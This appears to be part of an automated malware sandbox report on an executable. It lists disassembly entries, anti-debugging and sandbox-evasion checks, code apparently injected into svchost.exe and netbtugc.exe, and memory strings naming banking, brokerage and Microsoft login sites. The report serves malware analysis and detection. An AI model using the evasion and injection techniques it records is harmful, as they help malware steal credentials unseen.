            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024D3780 push eax; ret 2_2_024D3782
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024E47A2 push es; iretd 2_2_024E47AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024EA436 push ebx; iretd 2_2_024EA600
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024E8C92 pushad ; retf 2_2_024E8C93
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024EA5D9 push ebx; iretd 2_2_024EA600
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx 2_2_02F309B6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0310225F pushad ; ret 4_2_031027F9
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_031027FA pushad ; ret 4_2_031027F9
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_031309AD push ecx; mov dword ptr [esp], ecx 4_2_031309B6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0310283D push eax; iretd 4_2_03102858
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0310135E push eax; iretd 4_2_03101369
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02542238 pushad ; iretd 4_2_02542239
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0254AB37 push 00000038h; iretd 4_2_0254AB3B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02546E56 push ebx; iretd 4_2_02546E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02540EAB push ebp; retf 4_2_02540EAC
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02546CB3 push ebx; iretd 4_2_02546E7D
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0254101F push es; iretd 4_2_02541027
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02531126 push esp; ret 4_2_02531127
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0254D1B0 push es; ret 4_2_0254D1D0
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0254550F pushad ; retf 4_2_02545510
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0254FEF5 push FFFFFFBAh; ret 4_2_0254FEF7
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0253FFA0 push esi; iretd 4_2_0253FFA5
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DA429A push cs; retf 4_2_02DA42F6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DA4268 push cs; retf 4_2_02DA42F6
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DA03DA push ebx; ret 4_2_02DA042C
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DAD620 push esi; ret 4_2_02DAD63B
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_02DA47F5 push es; ret 4_2_02DA47FA
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_006EF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_006EF98E
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_00761C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00761C41
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep graph_0-95984
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe API/Special instruction interceptor: Address: 15C3244
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\netbtugc.exe API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 4124
            Source: C:\Windows\SysWOW64\netbtugc.exe Window / User API: threadDelayed 5848
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe API coverage: 3.8 %
            Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4048 Thread sleep count: 4124 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4048 Thread sleep time: -8248000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4048 Thread sleep count: 5848 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 4048 Thread sleep time: -11696000s >= -30000s
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576 Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576 Thread sleep count: 38 > 30
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576 Thread sleep time: -57000s >= -30000s
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576 Thread sleep count: 48 > 30
            Source: C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe TID: 5576 Thread sleep time: -48000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_0073DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0073DBBE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_0070C2A2 FindFirstFileExW, 0_2_0070C2A2
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_007468EE FindFirstFileW,FindClose, 0_2_007468EE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_0074698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_0074698F
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_0073D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0073D076
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_0073D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0073D3A9
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_00749642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00749642
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_0074979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0074979D
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_00749B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00749B2B
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_00745C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00745C97
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4_2_0254BAB0 FindFirstFileW,FindNextFileW,FindClose, 4_2_0254BAB0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_006D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_006D42DE
            Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: F56GKLK7U4.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: F56GKLK7U4.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: F56GKLK7U4.4.dr Binary or memory string: discord.comVMware20,11696487552f
            Source: F56GKLK7U4.4.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: F56GKLK7U4.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: F56GKLK7U4.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: F56GKLK7U4.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: F56GKLK7U4.4.dr Binary or memory string: global block list test formVMware20,11696487552
            Source: F56GKLK7U4.4.dr Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: F56GKLK7U4.4.dr Binary or memory string: AMC password management pageVMware20,11696487552
            Source: netbtugc.exe, 00000004.00000002.4567487590.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2558088847.0000025CC6E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: F56GKLK7U4.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: F56GKLK7U4.4.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: F56GKLK7U4.4.dr Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: F56GKLK7U4.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: F56GKLK7U4.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: F56GKLK7U4.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: WOaBXdWwIJKzuV.exe, 00000008.00000002.4571526286.000000000138F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
            Source: F56GKLK7U4.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: F56GKLK7U4.4.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: F56GKLK7U4.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: F56GKLK7U4.4.dr Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: F56GKLK7U4.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: F56GKLK7U4.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: F56GKLK7U4.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: F56GKLK7U4.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: F56GKLK7U4.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F7096E rdtsc 2_2_02F7096E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024E7823 LdrLoadDll, 2_2_024E7823
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_0074EAA2 BlockInput, 0_2_0074EAA2
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_00702622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00702622
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_006D42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_006D42DE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_006F4CE8 mov eax, dword ptr fs:[00000030h] 0_2_006F4CE8
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_015C3510 mov eax, dword ptr fs:[00000030h] 0_2_015C3510
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_015C34B0 mov eax, dword ptr fs:[00000030h] 0_2_015C34B0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe Code function: 0_2_015C1E70 mov eax, dword ptr fs:[00000030h] 0_2_015C1E70
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h] 2_2_02F402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h] 2_2_02F3A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov eax, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC62A0 mov ecx, dword ptr fs:[00000030h] 2_2_02FC62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6E284 mov eax, dword ptr fs:[00000030h] 2_2_02F6E284
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB0283 mov eax, dword ptr fs:[00000030h] 2_2_02FB0283
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FE0274 mov eax, dword ptr fs:[00000030h] 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F34260 mov eax, dword ptr fs:[00000030h] 2_2_02F34260
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2826B mov eax, dword ptr fs:[00000030h] 2_2_02F2826B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A250 mov eax, dword ptr fs:[00000030h] 2_2_02F2A250
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F36259 mov eax, dword ptr fs:[00000030h] 2_2_02F36259
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB8243 mov eax, dword ptr fs:[00000030h] 2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB8243 mov ecx, dword ptr fs:[00000030h] 2_2_02FB8243
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2823B mov eax, dword ptr fs:[00000030h] 2_2_02F2823B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E3F0 mov eax, dword ptr fs:[00000030h] 2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F663FF mov eax, dword ptr fs:[00000030h] 2_2_02F663FF
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h] 2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h] 2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h] 2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h] 2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h] 2_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h] 2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h] 2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h] 2_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h] 2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h] 2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h] 2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h] 2_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h] 2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h] 2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h] 2_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h] 2_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h] 2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h] 2_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h] 2_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h] 2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h] 2_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h] 2_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h] 2_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h] 2_2_02FB60E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h] 2_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h] 2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h] 2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h] 2_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h] 2_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h] 2_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h] 2_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h] 2_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h] 2_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h] 2_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h] 2_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h] 2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h] 2_2_030061E5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h] 2_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h] 2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h] 2_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h] 2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]2_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
